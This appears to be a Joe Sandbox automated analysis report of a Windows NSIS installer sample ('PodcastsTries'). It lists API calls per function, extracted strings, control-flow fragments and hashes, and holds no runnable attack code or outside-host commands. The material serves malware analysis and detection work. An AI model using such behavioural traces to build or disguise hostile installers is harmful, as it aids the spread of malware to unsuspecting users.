                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,GrassConnectorTransThehun,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,GrassConnectorTransThehun,GrassConnectorTransThehun,00000000,00000000,GrassConnectorTransThehun,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$GrassConnectorTransThehun

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00426176,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                          • String ID: (]C$... %d%%$pAB$v!B$vaB

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNELBASE(007BC958), ref: 00402387
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: Exch: stack < %d elements$GrassConnectorTransThehun$Pop: stack empty
                                                                                                                                                                                                                                                                                                          • API String ID: 1459762280-201286362
                                                                                                                                                                                                                                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNELBASE(007BC958), ref: 00402387
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: <RM>$GrassConnectorTransThehun$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                          • API String ID: 247603264-2339468215
                                                                                                                                                                                                                                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                          APIs
